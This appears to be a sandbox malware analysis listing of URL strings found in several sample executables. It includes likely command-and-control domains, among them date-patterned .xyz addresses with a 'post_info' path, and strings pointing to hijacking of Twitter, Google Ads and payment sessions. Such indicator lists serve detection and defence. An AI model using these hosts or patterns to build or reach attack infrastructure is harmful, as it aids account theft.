Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xCDZ.img?h=75&w=100
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xMWp.img?h=75&w=100
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xssM.img?h=75&w=100
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xzm6.img?h=250&w=30
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yFoT.img?h=75&w=100
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
Source: MiniThunderPlatform.exe.2.dr String found in binary or memory: http://store.paycenter.uc.cn
Source: MiniThunderPlatform.exe.2.dr String found in binary or memory: http://store.paycenter.uc.cnmail-attachment.googleusercontent.com
Source: Cyfj6XGbkd.exe String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Cyfj6XGbkd.exe String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Cyfj6XGbkd.exe String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 56BB1610C0318054.exe, 00000002.00000003.277066236.00000000031B9000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: 56BB1610C0318054.exe, 00000004.00000002.262859007.000000000325F000.00000004.00000001.sdmp String found in binary or memory: http://www.interestvideo.com/video1.php
Source: 56BB1610C0318054.exe, 00000002.00000003.277318880.000000000311B000.00000004.00000001.sdmp String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: 56BB1610C0318054.exe, 00000002.00000003.277318880.000000000311B000.00000004.00000001.sdmp String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chromeJk
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://www.msn.com
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://www.msn.com/
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
Source: 1611971443428.exe, 00000008.00000002.270080121.0000000000198000.00000004.00000010.sdmp String found in binary or memory: http://www.nirsoft.net
Source: 1611971443428.exe, 1611971443428.exe.2.dr String found in binary or memory: http://www.nirsoft.net/
Source: download_engine.dll.2.dr String found in binary or memory: http://www.openssl.org/support/faq.html
Source: download_engine.dll.2.dr String found in binary or memory: http://www.openssl.org/support/faq.html....................
Source: Cyfj6XGbkd.exe String found in binary or memory: http://www.vb-audio.com
Source: Cyfj6XGbkd.exe String found in binary or memory: http://www.vb-cable.com
Source: Cyfj6XGbkd.exe String found in binary or memory: http://www.vb-cable.comVBCABLE
Source: download_engine.dll.2.dr String found in binary or memory: http://www.xunlei.com/
Source: download_engine.dll.2.dr String found in binary or memory: http://www.xunlei.com/GET
Source: 56BB1610C0318054.exe, 00000004.00000003.258915262.0000000002F77000.00000004.00000001.sdmp String found in binary or memory: http://www.youtube.com
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;g
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674
Source: 56BB1610C0318054.exe, 00000002.00000003.329844310.0000000002AB7000.00000004.00000040.sdmp String found in binary or memory: https://A5D4CE54CC78B3CA.xyz/
Source: Web Data1611971454381.2.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259051074.0000000002F74000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://ads.google.com/nav/_/rpc/GaiaInfoService/Get?authuser=0&rpcTrackingId=GaiaInfoService.Get%3A
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://ads.google.com/nav/_/rpc/UserByGaiaService/Get?authuser=0&rpcTrackingId=UserByGaiaService.Ge
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://ads.google.com/nav/_/rpc/UserCustomerAccessService/List?authuser=0&rpcTrackingId=UserCustome
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://ads.google.com/nav/selectaccount
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://ads.google.com/nav/selectaccountocation:
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://ads.google.comsec-fetch-dest:
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://api.twitter.com/1.1/statuses/update.json
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://api.twitter.com/1.1/statuses/update.jsoninclude_profile_interstitial_type=1&include_blocking
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259051074.0000000002F74000.00000004.00000001.sdmp String found in binary or memory: https://apis.google.com
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: Web Data1611971454381.2.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 56BB1610C0318054.exe, 00000004.00000003.259422321.0000000002F40000.00000004.00000001.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: 56BB1610C0318054.exe, 00000004.00000003.258743685.0000000002FCB000.00000004.00000001.sdmp, background.js.4.dr String found in binary or memory: https://chrome.google.com/webstore/category/extension
Source: 56BB1610C0318054.exe, 00000004.00000003.259091909.00000000020EC000.00000004.00000001.sdmp String found in binary or memory: https://chrome.google.com/webstoreAA
Source: 56BB1610C0318054.exe String found in binary or memory: https://clients2.google.com/service/update2/cr
Source: 56BB1610C0318054.exe, 00000004.00000003.259422321.0000000002F40000.00000004.00000001.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 56BB1610C0318054.exe, 00000004.00000003.259071700.0000000002F53000.00000004.00000001.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx4
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxa
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxo
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259051074.0000000002F74000.00000004.00000001.sdmp String found in binary or memory: https://content.googleapis.com
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://contextual.media.net/
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://contextual.media.net/48/nrrV18753.js
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: 56BB1610C0318054.exe, 00000002.00000002.334703397.000000000340F000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.262859007.000000000325F000.00000004.00000001.sdmp String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
Source: Cyfj6XGbkd.exe String found in binary or memory: https://d.symcb.com/cps0%
Source: Cyfj6XGbkd.exe String found in binary or memory: https://d.symcb.com/rpa0
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD3B6173
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.258915262.0000000002F77000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.258915262.0000000002F77000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/
Source: 56BB1610C0318054.exe String found in binary or memory: https://drive.google.com/?usp=chrome_app
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/?usp=chrome_appk/B
Source: 56BB1610C0318054.exe String found in binary or memory: https://drive.google.com/drive/settings
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/drive/settingsawl7
Source: Web Data1611971454381.2.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Web Data1611971454381.2.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Web Data1611971454381.2.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259051074.0000000002F74000.00000004.00000001.sdmp String found in binary or memory: https://feedback.googleusercontent.com
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://fonts.googleapis.com/css?family=Google
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259051074.0000000002F74000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com;
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259051074.0000000002F74000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com;
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: 56BB1610C0318054.exe String found in binary or memory: https://hangouts.google.com/
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.js
Source: 56BB1610C0318054.exe String found in binary or memory: https://mail.google.com/mail
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://mail.google.com/mail/#settings
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-22-21-45-19/PreSignInSettingsConfig.json
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-24-17-35-16/PreSignInSettingsConfig.json?One
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update10.xml?OneDriveUpdate=79d8737dc86cbccc6833c
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://onecs-live.azureedge.net/api/settings/en-US/xml/settings-tipset?release=rs4
Source: 56BB1610C0318054.exe String found in binary or memory: https://payments.google.com/
Source: 56BB1610C0318054.exe String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jstW2
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://pki.goog/repository/0
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 56BB1610C0318054.exe String found in binary or memory: https://sandbox.google.com/
Source: 56BB1610C0318054.exe String found in binary or memory: https://sandbox.google.com/payments/v4/js/integr
Source: 56BB1610C0318054.exe String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsuSS4
Source: Web Data1611971454381.2.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: Web Data1611971454381.2.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msn
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
Source: 56BB1610C0318054.exe, 00000002.00000003.276872790.0000000003100000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: 56BB1610C0318054.exe, 00000002.00000003.276872790.0000000003100000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_divxpt
Source: 56BB1610C0318054.exe, 00000002.00000003.277190351.000000000318F000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 56BB1610C0318054.exe, 00000002.00000003.277158883.0000000003117000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000002.00000003.329732369.000000000311B000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: 56BB1610C0318054.exe, 00000002.00000003.277158883.0000000003117000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: 56BB1610C0318054.exe, 00000002.00000003.277190351.000000000318F000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/compose/tweetsec-fetch-dest:
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/compose/tweetsec-fetch-mode:
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/ookie:
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://twitter.comReferer:
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://twitter.comsec-fetch-dest:
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.json
